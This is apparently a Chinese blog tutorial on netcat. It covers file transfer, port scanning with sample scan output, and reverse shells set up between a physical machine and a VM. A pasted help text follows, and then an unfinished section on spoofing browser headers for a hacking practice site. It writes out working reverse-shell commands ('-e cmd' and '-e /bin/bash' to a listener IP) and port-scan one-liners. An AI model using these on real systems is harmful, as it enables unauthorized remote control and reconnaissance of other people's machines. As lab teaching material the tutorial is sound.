netcat的简单使用(2)

1.文件传输

客户端传数据到服务端:

客户端和服务端可以通过netcat进行数据传输。原理、步骤如下:

在netcat文件夹中新建文件input.txt,并写入内容

 在netcat-win32-1.12目录下打开两个对话框(一个作为客户端,一个作为服务端),输入如下命令:(上面为服务端,下面为客户端),nc64 -lp 5566 >output.txt表示为可以将接收到的数据自动创建文件并写入该文件中,nc64.exe 127.0.0.1 5566 <input.txt表示为将刚才写好的客户端的数据传输给服务端。(写nc64.exe或者nc.exe,这个命令看你netcat文件夹里面有哪个,就写哪个)

发送后服务端接收数据,并自动创建文件,将内容写入文件中,效果如下:

服务端传数据到客户端:

在服务端该目录下创建文件并写入要传送到客户端的数据,如图:

打开命令窗口(创建两个对话框,上面是服务端,下面是客户端),nc64.exe -lp 5566 <reinput.txt表示将服务端的数据传输给客户端,nc64.exe 127.0.0.1 5566 >reoutput.txt表示将接收到的数据写入自动创建的文件里。

运行结束后,效果如图:

2.信息探测

可以进行端口的扫描

-n:表示IP
-v:显示执行命令过程
-w:设置超时时间
-z:不进行交互,直接显示结果
可以使用命令nc -n -v -w1 -z 192.168.79.125 1-1000
后面为扫描主机的IP地址,以及端口范围

也可以使用echo " " |nc -n -v -w1 192.168.35.154 1-1000输出端口内容。

可以在kali中进行尝试,扫描其他主机的端口情况。

3.反弹Shell

正向shell可以从前面发布的《netcat简单使用》中理解,即客户端控制服务端。而反弹shell刚好相反,即服务端控制客户端。下列可以简单描述一下其简单步骤和命令:

模拟环境①:将物理机作为服务端,将windows虚拟机作为客户端(其他情况也可以)

在物理机和虚拟机都要安装netcat才能使用命令。物理机打开netcat的目录,打开命令窗口后键入nc64.exe -lvp 5566,表示开启监听端口。虚拟机打开netcat目录并打开命令窗口后键入nc64.exe -e cmd 192.168.24.1 5566,后面的地址写物理机的IP地址,表示重定向到cmd命令并且连接物理机(服务端),运行后,物理机(服务端)就可以控制虚拟机(客户端),此时服务端就可以输入命令,例如ipconfig去查询客户端的IP地址等等。

模拟环境②:将物理机作为服务端,将Linux虚拟机作为客户端(跟上面原理一样)

物理机(服务端)命令:nc64.exe -lvp 5566   意为开启监听端口

虚拟机(客户端)命令:nc64.exe -e /bin/bash 192.168.24.1 5566   表示重定向到bash命令并连接主机地址,后面的地址写物理机地址,从而实现服务端控制客户端的效果。

本软件包含windows和linux两种版本 1、 了解NC的用法 命令:   nc –h 技巧:   win98用户可以在autoexec.bat加入path=nc的路径,win2000用户在环境变量中加入path中,linux含有这个命令(redhat) 1、基本使用   想要连接到某处: nc [-options] hostname port[s] [ports] ...   绑定端口等待连接: nc -l -p port [-options] [hostname] [port]   参数:   -e prog 程序重定向,一旦连接,就执行 [危险!!]   -g gateway source-routing hop point[s], up to 8   -G num source-routing pointer: 4, 8, 12, ...   -h 帮助信息   -i secs 延时的间隔   -l 监听模式,用于入站连接   -n 指定数字的IP地址,不能用hostname   -o file 记录16进制的传输   -p port 本地端口号   -r 任意指定本地及远程端口   -s addr 本地源地址   -u UDP模式   -v 详细输出——用两个-v可得到更详细的内容   -w secs timeout的时间   -z 将输入输出关掉——用于扫描时   其中端口号可以指定一个或者用lo-hi式的指定范围。   例如:扫描端口   tcp扫描   C:\nc>nc -v -z -w2 192.168.0.80 1-140   net [192.168.0.80] 140 (?)   net [192.168.0.80] 139 (netbios-ssn) open   net [192.168.0.80] 138 (?)   net [192.168.0.80] 137 (netbios-ns)   net [192.168.0.80] 136 (?)   net [192.168.0.80] 135 (epmap) open   net [192.168.0.80] 81 (?) open   net [192.168.0.80] 80 (http) open   net [192.168.0.80] 79 (finger)   net [192.168.0.80] 25 (smtp) open   net [192.168.0.80] 24 (?)   net [192.168.0.80] 23 (telnet)   net [192.168.0.80] 21 (ftp)   udp扫描   C:\nc>nc -u -v -z -w2 192.168.0.80 1-140   net [192.168.0.80] 140 (?) open   net [192.168.0.80] 139 (?) open   net [192.168.0.80] 138 (netbios-dgm) open   net [192.168.0.80] 137 (netbios-ns) open   net [192.168.0.80] 54 (?) open   net [192.168.0.80] 53 (domain) open   net [192.168.0.80] 38 (?) open   net [192.168.0.80] 37 (time) open   net [192.168.0.80] 7 (echo) open 2、高级应用   1.Window用法:   (1)IE的MIME欺骗   www.try2hack..nl(是一个让初学黑客技术的人去做实验的站点)   打开这个页面,有http://www.try2hack/cgi-bin/level7页面(这个网站提供了黑客的8关,过了这8关证明你开始入门了),这个页面告诉我们的浏览器不是 IE6.72,我们的操作系统不是LIUNX,我们不是从www.microsoft/ms重定向链接过去的,有病阿(这是一个题目呀,要慢慢研究),linux有IE6.72? 微软会在它的页面上放的链接?看看页面的源代码,是在服务器端 执行的perl脚本,根本无法看到,还是研究一下IE5和它通信时都告诉了它什么,抓包,我们会发现,我们的IE5告诉对方: 我是MSIE 5.0; Windows NT 5.0; .NET CLR 1.0.3705。。。。哈哈,这个cgi应该是根据这些信息知道我们不是它要求的 客户,嘿嘿,需要欺骗对方才行,用军刀来可以实现,如下做就可
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值